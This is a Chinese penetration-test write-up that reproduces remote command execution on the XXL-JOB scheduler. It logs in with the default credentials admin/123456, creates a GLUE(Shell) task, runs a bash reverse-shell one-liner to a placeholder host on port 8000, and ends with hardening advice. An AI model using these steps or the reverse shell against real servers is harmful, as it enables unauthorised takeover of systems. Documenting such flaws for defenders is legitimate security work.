xxl-job弱口令登录后台RCE复现渗透测试

简介

XXL-JOB是一个轻量级分布式任务调度平台,使用JAVA语言研发,使用其可以轻松的实现分布式任务调度,任务管理、执行、监控等功能,在国内颇受欢迎,目前已有多家公司接入xxl-job。
任务官方地址中文版:http://www.xuxueli.com/xxl-job

漏洞影响

xxl-job 全版本,获取后台权限可以管理所有的任务管理,甚至可以执行指令,接管服务器。

漏洞复现

1.登录界面如下使用弱口令登录系统 admin/123456


登录界面

2.选择 任务管理 - 新增 填写以下信息 运行模式使用 GLUE(Shell) 其他随填 符合规则即可


新增任务

3.编辑GLUE 远程开启监听,进行反弹


编辑GLUE

image
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/x.x.x.x/8000 <&1'

4.点击执行一次或者执行


image

5.反弹成功


image

注:笔者本次演示反弹较为顺利,读者在实际检测过程可能会遇到环境问题,比如:windows可结合windows反弹方式进行反弹,又或者linux 无执行权限,可借助其他方式getShell

修复建议

修复弱口令 任务调度限制内网访问

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关

欢迎讨论,持续更新中,感谢关注!

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 为获得更好的阅读体验,请访问原文:传送门 一、分布式任务调度概述 什么是任务调度平台 任务调度是指基于给定的时间点...
    我没有三颗心脏阅读 8,178评论 0 34
  • XXL-JOB简介: XXL-JOB官网:https://www.xuxueli.com/xxl-job/XXL-...
    salt丶阅读 12,260评论 0 1
  • 概述 XXL-JOB是一个轻量级分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源...
    Tian_Peng阅读 411,300评论 2 142
  • XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多...
    Q南南南Q阅读 23,360评论 1 7
  • 表情是什么,我认为表情就是表现出来的情绪。表情可以传达很多信息。高兴了当然就笑了,难过就哭了。两者是相互影响密不可...
    Persistenc_6aea阅读 127,763评论 2 7

友情链接更多精彩内容